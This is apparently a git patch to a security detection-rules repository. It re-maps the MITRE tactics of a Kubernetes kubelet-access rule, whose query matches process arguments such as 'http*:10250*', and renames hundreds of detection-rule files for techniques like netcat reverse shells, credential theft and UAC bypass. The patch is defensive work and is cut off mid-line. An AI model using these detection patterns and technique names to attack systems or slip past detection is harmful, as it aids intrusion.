diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml
similarity index 100%
rename from rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml
rename to rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml
index fb7dbc5c834..291fd00fe82 100644
--- a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml
+++ b/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml
@@ -71,24 +71,24 @@ process.args like "http*:10250*" and process.interactive == true and container.i
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
 [rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
From e83ddf130daef6fcdece2764d684cca21338d534 Mon Sep 17 00:00:00 2001
From: Ruben Groenewoud Date: Tue, 24 Mar 2026 10:49:41 +0100 Subject: [PATCH 06/16] ++ --- ...k_alert.toml => collection_azure_o365_with_network_alert.toml} | 0 ...lection_genai_process_encoding_prior_to_network_activity.toml} | 0 ...l => defense_evasion_virtual_machine_fingerprinting_grep.toml} | 0 ...=> initial_access_web_server_potential_command_injection.toml} | 0 ...dification.toml => persistence_genai_config_modification.toml} | 0 ...lation_trap_execution.toml => persistence_trap_execution.toml} | 0 ...resource_development_genai_process_compiling_executables.toml} | 0 ...al_user.toml => collection_dynamodb_scan_by_unusual_user.toml} | 0 ...stance_restored.toml => collection_rds_instance_restored.toml} | 0 ...s_snapshot_export.toml => collection_rds_snapshot_export.toml} | 0 ...defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml} | 0 ...eated.toml => defense_evasion_cloudtrail_logging_created.toml} | 0 ...dated.toml => defense_evasion_cloudtrail_logging_updated.toml} | 0 ...on.toml => defense_evasion_cloudwatch_log_group_deletion.toml} | 0 ...n.toml => defense_evasion_cloudwatch_log_stream_deletion.toml} | 0 ...ption.toml => defense_evasion_ec2_disable_ebs_encryption.toml} | 0 ...reation.toml => defense_evasion_ec2_network_acl_creation.toml} | 0 ...l => defense_evasion_ec2_route_table_modified_or_deleted.toml} | 0 ...vasion_ec2_security_group_configuration_change_detection.toml} | 0 ... => defense_evasion_iam_api_calls_via_user_session_token.toml} | 0 ...device.toml => defense_evasion_iam_deactivate_mfa_device.toml} | 0 ...pdated.toml => defense_evasion_iam_saml_provider_updated.toml} | 0 ...vasion_lambda_backdoor_invoke_function_for_any_principal.toml} | 0 ... 
defense_evasion_lambda_external_layer_added_to_function.toml} | 0 ...vasion_rds_instance_cluster_deletion_protection_disabled.toml} | 0 ..._public.toml => defense_evasion_rds_instance_made_public.toml} | 0 ...> defense_evasion_route_53_domain_transfer_lock_disabled.toml} | 0 ...fense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml} | 0 ...able_created.toml => defense_evasion_route_table_created.toml} | 0 ...defense_evasion_s3_bucket_policy_added_for_public_access.toml} | 0 ...ml => discovery_aws_s3_bucket_enumeration_or_brute_force.toml} | 0 ...ml => discovery_ec2_full_network_packet_capture_detected.toml} | 0 ...l => exfiltration_sns_topic_message_publish_by_rare_user.toml} | 0 ...dded.toml => impact_s3_bucket_lifecycle_expiration_added.toml} | 0 ..._rare_user.toml => impact_sns_topic_created_by_rare_user.toml} | 0 ...e_evasion_sqs_purge_queue.toml => impact_sqs_purge_queue.toml} | 0 ..._login.toml => initial_access_ec2_instance_console_login.toml} | 0 ...persistence_ec2_instance_connect_ssh_public_key_uploaded.toml} | 0 ...istence_iam_administratoraccess_policy_attached_to_group.toml} | 0 ...sistence_iam_administratoraccess_policy_attached_to_role.toml} | 0 ...sistence_iam_administratoraccess_policy_attached_to_user.toml} | 0 ...persistence_iam_customer_managed_policy_attached_to_role.toml} | 0 ...policy.toml => persistence_iam_update_assume_role_policy.toml} | 0 ..._to_group.toml => persistence_iam_user_addition_to_group.toml} | 0 ...tence_s3_bucket_policy_added_for_external_account_access.toml} | 0 ...ation_token.toml => persistence_sts_get_federation_token.toml} | 0 ..._sts_role_chaining.toml => persistence_sts_role_chaining.toml} | 0 ...d.toml => privilege_escalation_iam_oidc_provider_created.toml} | 0 ...velopment_route_53_domain_transferred_to_another_account.toml} | 0 ... 
collection_azure_storage_blob_download_azcopy_sas_token.toml} | 0 ...trieval.toml => collection_key_vault_excessive_retrieval.toml} | 0 ...ccess_azure_arc_cluster_credential_access_unusual_source.toml} | 0 ...ntra_id_illicit_consent_grant_via_registered_application.toml} | 0 ...entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} | 0 ..._id_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...dential_access_entra_id_protection_sign_in_risk_detected.toml} | 0 ...ss_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} | 0 ...tial_access_entra_id_teamfiltration_user_agents_detected.toml} | 0 ...eated.toml => defense_evasion_automation_account_created.toml} | 0 ...se_evasion_entra_id_actor_token_user_impersonation_abuse.toml} | 0 ...ense_evasion_entra_id_conditional_access_policy_modified.toml} | 0 ...nse_evasion_entra_id_device_code_auth_with_broker_client.toml} | 0 ...fense_evasion_entra_id_federated_login_by_unusual_client.toml} | 0 ...on_entra_id_graph_single_session_from_multiple_addresses.toml} | 0 ...r.toml => defense_evasion_entra_id_mfa_disabled_for_user.toml} | 0 ...on_entra_id_privileged_identity_management_role_modified.toml} | 0 ... 
defense_evasion_entra_id_rare_app_id_for_principal_auth.toml} | 0 ...evasion_entra_id_tenant_domain_federation_via_audit_logs.toml} | 0 ...ml => defense_evasion_graph_eam_addition_or_modification.toml} | 0 ...defense_evasion_graph_first_occurrence_of_client_request.toml} | 0 ...fense_evasion_storage_blob_container_access_modification.toml} | 0 ...itial_access_entra_id_user_signed_in_from_unusual_device.toml} | 0 ...l => persistence_azure_rbac_administrator_roles_assigned.toml} | 0 ...ersistence_entra_id_elevate_to_user_administrator_access.toml} | 0 ....toml => persistence_entra_id_external_guest_user_invite.toml} | 0 ...d.toml => persistence_kubernetes_aks_rolebinding_created.toml} | 0 ...ated.toml => persistence_storage_account_key_regenerated.toml} | 0 ...ml => command_and_control_ml_high_bytes_destination_port.toml} | 0 ...on.toml => defense_evasion_gcp_logging_sink_modification.toml} | 0 ...tion.toml => impact_gcp_iam_service_account_key_deletion.toml} | 0 ...eletion.toml => impact_gcp_pub_sub_subscription_deletion.toml} | 0 ...topic_deletion.toml => impact_gcp_pub_sub_topic_deletion.toml} | 0 ...toml => impact_gcp_virtual_private_cloud_network_deleted.toml} | 0 ...reation.toml => persistence_gcp_iam_custom_role_creation.toml} | 0 ...l => persistence_gcp_storage_bucket_permissions_modified.toml} | 0 ...> collection_github_high_number_of_cloned_repos_from_pat.toml} | 0 ...=> collection_github_repository_activity_from_unusual_ip.toml} | 0 ...y_user.toml => collection_high_number_of_cloning_by_user.toml} | 0 ...b_app_deleted.toml => defense_evasion_github_app_deleted.toml} | 0 ...epo.toml => impact_github_actions_bot_first_push_to_repo.toml} | 0 ...p_installed.toml => persistence_new_github_app_installed.toml} | 0 ...orkspace_drive_encryption_key_accessed_by_anonymous_user.toml} | 0 ...dential_access_google_workspace_mfa_enforcement_disabled.toml} | 0 ... 
=> defense_evasion_google_workspace_2sv_policy_disabled.toml} | 0 ...efense_evasion_google_workspace_password_policy_modified.toml} | 0 ...e_evasion_mfa_disabled_for_google_workspace_organization.toml} | 0 ...ecution_object_copied_to_external_drive_with_app_consent.toml} | 0 ..._google_drive_ownership_transferred_via_google_workspace.toml} | 0 ...ersistence_external_user_added_to_google_workspace_group.toml} | 0 ...l => persistence_google_workspace_suspended_user_renewed.toml} | 0 ...t.toml => defense_evasion_denied_service_account_request.toml} | 0 ...ml => discovery_forbidden_request_from_unsual_user_agent.toml} | 0 ...toml => discovery_unusual_request_response_by_user_agent.toml} | 0 ...tion_container_created_with_excessive_linux_capabilities.toml} | 0 ..._with_hostipc.toml => execution_pod_created_with_hostipc.toml} | 0 ...stnetwork.toml => execution_pod_created_with_hostnetwork.toml} | 0 ..._with_hostpid.toml => execution_pod_created_with_hostpid.toml} | 0 ... => execution_pod_created_with_sensitive_hostpath_volume.toml} | 0 ...ged_pod_created.toml => execution_privileged_pod_created.toml} | 0 ..._sensitive_rbac_change_followed_by_workload_modification.toml} | 0 ... 
execution_sensitive_workload_modification_by_user_agent.toml} | 0 ...tion_suspicious_assignment_of_controller_service_account.toml} | 0 ...nitial_access_exposed_service_created_with_type_nodeport.toml} | 0 ...toml => persistence_service_account_rbac_write_operation.toml} | 0 ....toml => privilege_escalation_forbidden_creation_request.toml} | 0 ...ess_args.toml => execution_ml_high_mean_rdp_process_args.toml} | 0 ...s.toml => exfiltration_ml_spike_in_remote_file_transfers.toml} | 0 ...tion.toml => collection_exchange_transport_rule_creation.toml} | 0 ...arch.toml => collection_sharepoint_sensitive_term_search.toml} | 0 ...ity_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...> credential_access_identity_unusual_sso_errors_for_user.toml} | 0 ...fense_evasion_exchange_new_or_modified_federation_domain.toml} | 0 ... => defense_evasion_exchange_transport_rule_modification.toml} | 0 ...dentity_illicit_consent_grant_via_registered_application.toml} | 0 ...ml => persistence_sharepoint_site_collection_admin_added.toml} | 0 ...=> defense_evasion_mfa_deactivation_with_no_reactivation.toml} | 0 ...oml => defense_evasion_multiple_sessions_for_single_user.toml} | 0 ...=> defense_evasion_multiple_user_agent_os_authentication.toml} | 0 ....toml => defense_evasion_okta_aitm_session_cookie_replay.toml} | 0 ...ense_evasion_okta_attempt_to_deactivate_okta_application.toml} | 0 ... 
defense_evasion_okta_attempt_to_modify_okta_application.toml} | 0 ...a_attempt_to_modify_or_delete_application_sign_on_policy.toml} | 0 ...ml => defense_evasion_sign_in_events_via_third_party_idp.toml} | 0 ...redentials_used_to_login_to_okta_account_after_mfa_reset.toml} | 0 ...on_successful_application_sso_from_unknown_client_device.toml} | 0 ...access.toml => defense_evasion_user_impersonation_access.toml} | 0 ...s_suspicious_okta_user_password_reset_or_unlock_attempts.toml} | 0 ...ume_of_pbpaste.toml => collection_high_volume_of_pbpaste.toml} | 0 ...granted.toml => collection_suspicious_tcc_access_granted.toml} | 0 ... => command_and_control_curl_execution_via_shell_profile.toml} | 0 ...mand_and_control_installer_package_spawned_network_event.toml} | 0 ..._and_control_scripting_osascript_exec_followed_by_netcon.toml} | 0 ...n.toml => defense_evasion_account_creation_hide_at_logon.toml} | 0 ...ense_evasion_evasion_hidden_launch_agent_deamon_creation.toml} | 0 ...t_filename.toml => defense_evasion_hidden_plist_filename.toml} | 0 ...s_sip_check.toml => defense_evasion_suspicious_sip_check.toml} | 0 ...min_privs.toml => execution_applescript_with_admin_privs.toml} | 0 ...scripting.toml => execution_explicit_creds_via_scripting.toml} | 0 ...ction.toml => execution_perl_outbound_network_connection.toml} | 0 ...toml => execution_suspicious_mac_ms_office_child_process.toml} | 0 ...on_attempt.toml => initial_access_vpn_connection_attempt.toml} | 0 ...d_to_admin.toml => persistence_local_user_added_to_admin.toml} | 0 ...gin_enabled.toml => persistence_remote_ssh_login_enabled.toml} | 0 ...crontab_filemod.toml => persistence_root_crontab_filemod.toml} | 0 ...dmin_group.toml => persistence_user_added_to_admin_group.toml} | 0 ...ript.toml => defense_evasion_ml_windows_anomalous_script.toml} | 0 ...st_linux.toml => execution_ml_rare_process_by_host_linux.toml} | 0 ...ity.toml => execution_ml_windows_anomalous_path_activity.toml} | 0 ....toml => 
execution_ml_windows_anomalous_process_creation.toml} | 0 ...nd_and_control_rpc_remote_procedure_call_to_the_internet.toml} | 0 ...pt.toml => execution_react_server_components_rce_attempt.toml} | 0 ...ration_smb_windows_file_sharing_activity_to_the_internet.toml} | 0 ...> initial_access_accepted_default_telnet_port_connection.toml} | 0 ...ial_access_rdp_remote_desktop_protocol_from_the_internet.toml} | 0 ...l_access_vnc_virtual_network_computing_from_the_internet.toml} | 0 ..._node.toml => reconnaissance_unsecure_elasticsearch_node.toml} | 0 ...ml => defense_evasion_endgame_cred_manipulation_detected.toml} | 0 ...l => defense_evasion_endgame_cred_manipulation_prevented.toml} | 0 ...oml => defense_evasion_endgame_permission_theft_detected.toml} | 0 ...ml => defense_evasion_endgame_permission_theft_prevented.toml} | 0 ...ml => defense_evasion_endgame_process_injection_detected.toml} | 0 ...l => defense_evasion_endgame_process_injection_prevented.toml} | 0 ...ccess_adidns_wildcard.toml => collection_adidns_wildcard.toml} | 0 ...nusual_parent.toml => collection_browsers_unusual_parent.toml} | 0 ...ess_dnsnode_creation.toml => collection_dnsnode_creation.toml} | 0 ...ig_file_access.toml => collection_web_config_file_access.toml} | 0 ...nd_and_control_command_prompt_connecting_to_the_internet.toml} | 0 ...yload.toml => command_and_control_msiexec_remote_payload.toml} | 0 ...tcat.toml => command_and_control_revshell_cmd_via_netcat.toml} | 0 ...bdav.toml => command_and_control_scripting_remote_webdav.toml} | 0 ...toml => command_and_control_suspicious_certutil_commands.toml} | 0 ...mmand_and_control_unusual_network_connection_via_dllhost.toml} | 0 ...mand_and_control_unusual_network_connection_via_rundll32.toml} | 0 ...ctions.toml => credential_access_posh_hacktool_functions.toml} | 0 ...stination.toml => credential_access_smb_rare_destination.toml} | 0 ...te_creds_pth.toml => defense_evasion_alternate_creds_pth.toml} | 0 ...bject_xwizard.toml => 
defense_evasion_com_object_xwizard.toml} | 0 ...dll32.toml => defense_evasion_command_shell_via_rundll32.toml} | 0 ...toml => defense_evasion_create_process_as_different_user.toml} | 0 ...toml => defense_evasion_create_process_with_token_unpriv.toml} | 0 ...l_movement_dcom_mmc20.toml => defense_evasion_dcom_mmc20.toml} | 0 ...toml => defense_evasion_delayed_via_ping_lolbas_unsigned.toml} | 0 ...ac_registry.toml => defense_evasion_disable_uac_registry.toml} | 0 ...=> defense_evasion_evasion_hidden_local_account_creation.toml} | 0 ...e_evasion_evasion_registry_startup_shell_folder_modified.toml} | 0 ... => defense_evasion_evasion_suspicious_htm_file_creation.toml} | 0 ...ver_loaded.toml => defense_evasion_expired_driver_loaded.toml} | 0 ...mcity.toml => defense_evasion_exploit_jetbrains_teamcity.toml} | 0 ...mdline.toml => defense_evasion_from_unusual_path_cmdline.toml} | 0 ..._html_help_executable_program_connecting_to_the_internet.toml} | 0 ...tion.toml => defense_evasion_krbrelayup_service_creation.toml} | 0 ...ake_token_local.toml => defense_evasion_make_token_local.toml} | 0 ...artup.toml => defense_evasion_msi_installer_task_startup.toml} | 0 ...cess.toml => defense_evasion_newcreds_logon_rare_process.toml} | 0 ...cutable.toml => defense_evasion_posh_portable_executable.toml} | 0 ...onation.toml => defense_evasion_posh_token_impersonation.toml} | 0 ...it.toml => defense_evasion_potential_webhelpdesk_exploit.toml} | 0 ...=> defense_evasion_printspooler_suspicious_file_deletion.toml} | 0 ...ed_registry.toml => defense_evasion_rdp_enabled_registry.toml} | 0 ...asion_register_server_program_connecting_to_the_internet.toml} | 0 ...cs.toml => defense_evasion_sdprop_exclusion_dsheuristics.toml} | 0 ...vices_registry.toml => defense_evasion_services_registry.toml} | 0 ...fense_evasion_suspicious_execution_from_vscode_extension.toml} | 0 ...ml => defense_evasion_suspicious_ms_office_child_process.toml} | 0 ...ous_psexesvc.toml => 
defense_evasion_suspicious_psexesvc.toml} | 0 ... => defense_evasion_suspicious_windows_server_update_svc.toml} | 0 ...d.toml => defense_evasion_tokenmanip_sedebugpriv_enabled.toml} | 0 ...com_clipup.toml => defense_evasion_uac_bypass_com_clipup.toml} | 0 ...ieinstal.toml => defense_evasion_uac_bypass_com_ieinstal.toml} | 0 ...l => defense_evasion_uac_bypass_com_interface_icmluautil.toml} | 0 ...ck.toml => defense_evasion_uac_bypass_diskcleanup_hijack.toml} | 0 ...ading.toml => defense_evasion_uac_bypass_dll_sideloading.toml} | 0 ...t_viewer.toml => defense_evasion_uac_bypass_event_viewer.toml} | 0 ...ck_windir.toml => defense_evasion_uac_bypass_mock_windir.toml} | 0 ...jack.toml => defense_evasion_uac_bypass_winfw_mmc_hijack.toml} | 0 ...toml => defense_evasion_unusual_parentchild_relationship.toml} | 0 ...l => defense_evasion_unusual_svchost_childproc_childless.toml} | 0 ...ve_2025_33053.toml => defense_evasion_url_cve_2025_33053.toml} | 0 ...mand.toml => defense_evasion_via_bits_job_notify_command.toml} | 0 ...html_file.toml => defense_evasion_via_compiled_html_file.toml} | 0 ...ame.toml => defense_evasion_via_hidden_run_key_valuename.toml} | 0 ...conhost.toml => defense_evasion_via_hidden_shell_conhost.toml} | 0 ...oml => defense_evasion_via_mmc_console_file_unusual_path.toml} | 0 ..._via_token_theft.toml => defense_evasion_via_token_theft.toml} | 0 ...args.toml => defense_evasion_windows_cmd_shell_susp_args.toml} | 0 ...md_ps.toml => defense_evasion_windows_fakecaptcha_cmd_ps.toml} | 0 ...rgs.toml => defense_evasion_windows_powershell_susp_args.toml} | 0 ...net.toml => defense_evasion_windows_script_from_internet.toml} | 0 ...com.toml => defense_evasion_xsl_script_execution_via_com.toml} | 0 ..._via_wmiprvse.toml => discovery_enumeration_via_wmiprvse.toml} | 0 ...teral_movement_cmd_service.toml => execution_cmd_service.toml} | 0 ...ow.toml => execution_dcom_shellwindow_shellbrowserwindow.toml} | 0 ...duled_task.toml => 
execution_group_policy_scheduled_task.toml} | 0 ...ral_movement_incoming_wmi.toml => execution_incoming_wmi.toml} | 0 ...il_attachment.toml => execution_rdp_file_mail_attachment.toml} | 0 ...vement_remote_services.toml => execution_remote_services.toml} | 0 ...ion_winlog.toml => execution_remote_task_creation_winlog.toml} | 0 ...uled_task_target.toml => execution_scheduled_task_target.toml} | 0 ...powershell.toml => execution_script_executing_powershell.toml} | 0 ...ia_wmi.toml => execution_scripts_process_started_via_wmi.toml} | 0 ...int.toml => execution_service_control_spawned_script_int.toml} | 0 ...=> execution_suspicious_ms_exchange_worker_child_process.toml} | 0 ...ss.toml => execution_suspicious_ms_outlook_child_process.toml} | 0 ...ml => execution_suspicious_process_access_direct_syscall.toml} | 0 ...time.toml => execution_suspicious_scheduled_task_runtime.toml} | 0 ..._process.toml => execution_suspicious_zoom_child_process.toml} | 0 ...ia_services.toml => execution_system_shells_via_services.toml} | 0 ...emp_scheduled_task.toml => execution_temp_scheduled_task.toml} | 0 ...l => execution_via_explorer_suspicious_child_parent_args.toml} | 0 ...rvices.toml => execution_via_wmi_stdregprov_run_services.toml} | 0 ...vement_via_wsus_update.toml => execution_via_wsus_update.toml} | 0 ...toml => execution_via_xp_cmdshell_mssql_stored_procedure.toml} | 0 ... 
=> execution_volume_shadow_copy_deletion_via_powershell.toml} | 0 ...c.toml => execution_volume_shadow_copy_deletion_via_wmic.toml} | 0 ..._webshell_detection.toml => execution_webshell_detection.toml} | 0 ...t_server.toml => execution_webshell_screenconnect_server.toml} | 0 ...se_evasion_wsl_bash_exec.toml => execution_wsl_bash_exec.toml} | 0 ...oml => initial_access_account_takeover_mixed_logon_types.toml} | 0 ...t_files.toml => initial_access_downloaded_shortcut_files.toml} | 0 ...aded_url_file.toml => initial_access_downloaded_url_file.toml} | 0 ..._source_ip.toml => initial_access_takeover_new_source_ip.toml} | 0 ...dren.toml => initial_access_unusual_dns_service_children.toml} | 0 ...s.toml => initial_access_unusual_dns_service_file_writes.toml} | 0 ...r_dmsa_abuse.toml => persistence_badsuccessor_dmsa_abuse.toml} | 0 ...on_credroaming_ldap.toml => persistence_credroaming_ldap.toml} | 0 ...c_user_backdoor.toml => persistence_dcsync_user_backdoor.toml} | 0 ...l_user.toml => persistence_dmsa_creation_by_unusual_user.toml} | 0 ...elplugindll.toml => persistence_dns_serverlevelplugindll.toml} | 0 ...reation.toml => persistence_gpo_schtask_service_creation.toml} | 0 ...icy_iniscript.toml => persistence_group_policy_iniscript.toml} | 0 ...on_lsa_auth_package.toml => persistence_lsa_auth_package.toml} | 0 ...oaded_susp_dll.toml => persistence_lsass_loaded_susp_dll.toml} | 0 ...> persistence_masquerading_suspicious_werfault_childproc.toml} | 0 ..._outlook_home_page.toml => persistence_outlook_home_page.toml} | 0 ...e.toml => persistence_port_monitor_print_processor_abuse.toml} | 0 ...gepath_mod.toml => persistence_reg_service_imagepath_mod.toml} | 0 ...motemonologue.toml => persistence_regmod_remotemonologue.toml} | 0 ...ed.toml => persistence_scheduledjobs_at_protocol_enabled.toml} | 0 ...persistence_seenabledelegationprivilege_assigned_to_user.toml} | 0 ...hadow_credentials.toml => persistence_shadow_credentials.toml} | 0 ...sxs_dll.toml => 
persistence_shared_modules_local_sxs_dll.toml} | 0 ...bute_modified.toml => persistence_spn_attribute_modified.toml} | 0 ...t.toml => persistence_windows_service_via_unusual_client.toml} | 0 ...t.toml => collection_github_new_repo_interaction_for_pat.toml} | 0 ....toml => collection_github_new_repo_interaction_for_user.toml} | 0 ...p.toml => collection_github_repo_interaction_from_new_ip.toml} | 0 ...apability.toml => credential_access_capnetraw_capability.toml} | 0 ...ml => credential_access_okta_admin_console_login_failure.toml} | 0 ...dmin_activity.toml => defense_evasion_bitsadmin_activity.toml} | 0 ...at.toml => defense_evasion_github_new_ip_address_for_pat.toml} | 0 ...for_user.toml => defense_evasion_github_new_pat_for_user.toml} | 0 ...eration.toml => defense_evasion_linux_sysctl_enumeration.toml} | 0 ...sion.toml => defense_evasion_mdmp_file_unusual_extension.toml} | 0 ....toml => defense_evasion_settingcontent_ms_file_creation.toml} | 0 ..._abuse.toml => defense_evasion_sts_getsessiontoken_abuse.toml} | 0 ...rns.toml => execution_anomalous_rsc_flight_data_patterns.toml} | 0 .../{lateral_movement_at.toml => execution_at.toml} | 0 ...susp_extension.toml => execution_download_susp_extension.toml} | 0 ..._from_msoffice.toml => execution_injection_from_msoffice.toml} | 0 ...picious_child.toml => execution_outlook_suspicious_child.toml} | 0 ...osh_winrm_activity.toml => execution_posh_winrm_activity.toml} | 0 ..._accounts.toml => execution_unusual_process_sql_accounts.toml} | 0 ...teral_movement_wmic_remote.toml => execution_wmic_remote.toml} | 0 ...al.toml => initial_access_entra_id_risk_detection_signal.toml} | 0 ...oml => initial_access_web_server_potential_sql_injection.toml} | 0 ..._pat.toml => persistence_github_new_event_action_for_pat.toml} | 0 ...umeration.toml => persistence_linux_modprobe_enumeration.toml} | 0 ..._path_registry.toml => persistence_service_path_registry.toml} | 0 ..._services_exe_path.toml => persistence_services_exe_path.toml} | 0 
...on_write_dac_access.toml => persistence_write_dac_access.toml} | 0 ...created.toml => resource_development_github_repo_created.toml} | 0 321 files changed, 0 insertions(+), 0 deletions(-) rename rules/cross-platform/{initial_access_azure_o365_with_network_alert.toml => collection_azure_o365_with_network_alert.toml} (100%) rename rules/cross-platform/{defense_evasion_genai_process_encoding_prior_to_network_activity.toml => collection_genai_process_encoding_prior_to_network_activity.toml} (100%) rename rules/cross-platform/{discovery_virtual_machine_fingerprinting_grep.toml => defense_evasion_virtual_machine_fingerprinting_grep.toml} (100%) rename rules/cross-platform/{persistence_web_server_potential_command_injection.toml => initial_access_web_server_potential_command_injection.toml} (100%) rename rules/cross-platform/{defense_evasion_genai_config_modification.toml => persistence_genai_config_modification.toml} (100%) rename rules/cross-platform/{privilege_escalation_trap_execution.toml => persistence_trap_execution.toml} (100%) rename rules/cross-platform/{defense_evasion_genai_process_compiling_executables.toml => resource_development_genai_process_compiling_executables.toml} (100%) rename rules/integrations/aws/{exfiltration_dynamodb_scan_by_unusual_user.toml => collection_dynamodb_scan_by_unusual_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_rds_instance_restored.toml => collection_rds_instance_restored.toml} (100%) rename rules/integrations/aws/{exfiltration_rds_snapshot_export.toml => collection_rds_snapshot_export.toml} (100%) rename rules/integrations/aws/{impact_aws_eventbridge_rule_disabled_or_deleted.toml => defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml} (100%) rename rules/integrations/aws/{collection_cloudtrail_logging_created.toml => defense_evasion_cloudtrail_logging_created.toml} (100%) rename rules/integrations/aws/{impact_cloudtrail_logging_updated.toml => defense_evasion_cloudtrail_logging_updated.toml} 
(100%) rename rules/integrations/aws/{impact_cloudwatch_log_group_deletion.toml => defense_evasion_cloudwatch_log_group_deletion.toml} (100%) rename rules/integrations/aws/{impact_cloudwatch_log_stream_deletion.toml => defense_evasion_cloudwatch_log_stream_deletion.toml} (100%) rename rules/integrations/aws/{impact_ec2_disable_ebs_encryption.toml => defense_evasion_ec2_disable_ebs_encryption.toml} (100%) rename rules/integrations/aws/{persistence_ec2_network_acl_creation.toml => defense_evasion_ec2_network_acl_creation.toml} (100%) rename rules/integrations/aws/{persistence_ec2_route_table_modified_or_deleted.toml => defense_evasion_ec2_route_table_modified_or_deleted.toml} (100%) rename rules/integrations/aws/{persistence_ec2_security_group_configuration_change_detection.toml => defense_evasion_ec2_security_group_configuration_change_detection.toml} (100%) rename rules/integrations/aws/{persistence_iam_api_calls_via_user_session_token.toml => defense_evasion_iam_api_calls_via_user_session_token.toml} (100%) rename rules/integrations/aws/{impact_iam_deactivate_mfa_device.toml => defense_evasion_iam_deactivate_mfa_device.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_saml_provider_updated.toml => defense_evasion_iam_saml_provider_updated.toml} (100%) rename rules/integrations/aws/{persistence_lambda_backdoor_invoke_function_for_any_principal.toml => defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml} (100%) rename rules/integrations/aws/{execution_lambda_external_layer_added_to_function.toml => defense_evasion_lambda_external_layer_added_to_function.toml} (100%) rename rules/integrations/aws/{impact_rds_instance_cluster_deletion_protection_disabled.toml => defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml} (100%) rename rules/integrations/aws/{persistence_rds_instance_made_public.toml => defense_evasion_rds_instance_made_public.toml} (100%) rename 
rules/integrations/aws/{persistence_route_53_domain_transfer_lock_disabled.toml => defense_evasion_route_53_domain_transfer_lock_disabled.toml} (100%) rename rules/integrations/aws/{persistence_route_53_hosted_zone_associated_with_a_vpc.toml => defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml} (100%) rename rules/integrations/aws/{persistence_route_table_created.toml => defense_evasion_route_table_created.toml} (100%) rename rules/integrations/aws/{exfiltration_s3_bucket_policy_added_for_public_access.toml => defense_evasion_s3_bucket_policy_added_for_public_access.toml} (100%) rename rules/integrations/aws/{impact_aws_s3_bucket_enumeration_or_brute_force.toml => discovery_aws_s3_bucket_enumeration_or_brute_force.toml} (100%) rename rules/integrations/aws/{exfiltration_ec2_full_network_packet_capture_detected.toml => discovery_ec2_full_network_packet_capture_detected.toml} (100%) rename rules/integrations/aws/{lateral_movement_sns_topic_message_publish_by_rare_user.toml => exfiltration_sns_topic_message_publish_by_rare_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_s3_bucket_lifecycle_expiration_added.toml => impact_s3_bucket_lifecycle_expiration_added.toml} (100%) rename rules/integrations/aws/{resource_development_sns_topic_created_by_rare_user.toml => impact_sns_topic_created_by_rare_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_sqs_purge_queue.toml => impact_sqs_purge_queue.toml} (100%) rename rules/integrations/aws/{lateral_movement_ec2_instance_console_login.toml => initial_access_ec2_instance_console_login.toml} (100%) rename rules/integrations/aws/{lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml => persistence_ec2_instance_connect_ssh_public_key_uploaded.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml => persistence_iam_administratoraccess_policy_attached_to_group.toml} (100%) rename 
rules/integrations/aws/{privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml => persistence_iam_administratoraccess_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml => persistence_iam_administratoraccess_policy_attached_to_user.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_customer_managed_policy_attached_to_role.toml => persistence_iam_customer_managed_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_update_assume_role_policy.toml => persistence_iam_update_assume_role_policy.toml} (100%) rename rules/integrations/aws/{credential_access_iam_user_addition_to_group.toml => persistence_iam_user_addition_to_group.toml} (100%) rename rules/integrations/aws/{exfiltration_s3_bucket_policy_added_for_external_account_access.toml => persistence_s3_bucket_policy_added_for_external_account_access.toml} (100%) rename rules/integrations/aws/{defense_evasion_sts_get_federation_token.toml => persistence_sts_get_federation_token.toml} (100%) rename rules/integrations/aws/{privilege_escalation_sts_role_chaining.toml => persistence_sts_role_chaining.toml} (100%) rename rules/integrations/aws/{persistence_iam_oidc_provider_created.toml => privilege_escalation_iam_oidc_provider_created.toml} (100%) rename rules/integrations/aws/{persistence_route_53_domain_transferred_to_another_account.toml => resource_development_route_53_domain_transferred_to_another_account.toml} (100%) rename rules/integrations/azure/{exfiltration_azure_storage_blob_download_azcopy_sas_token.toml => collection_azure_storage_blob_download_azcopy_sas_token.toml} (100%) rename 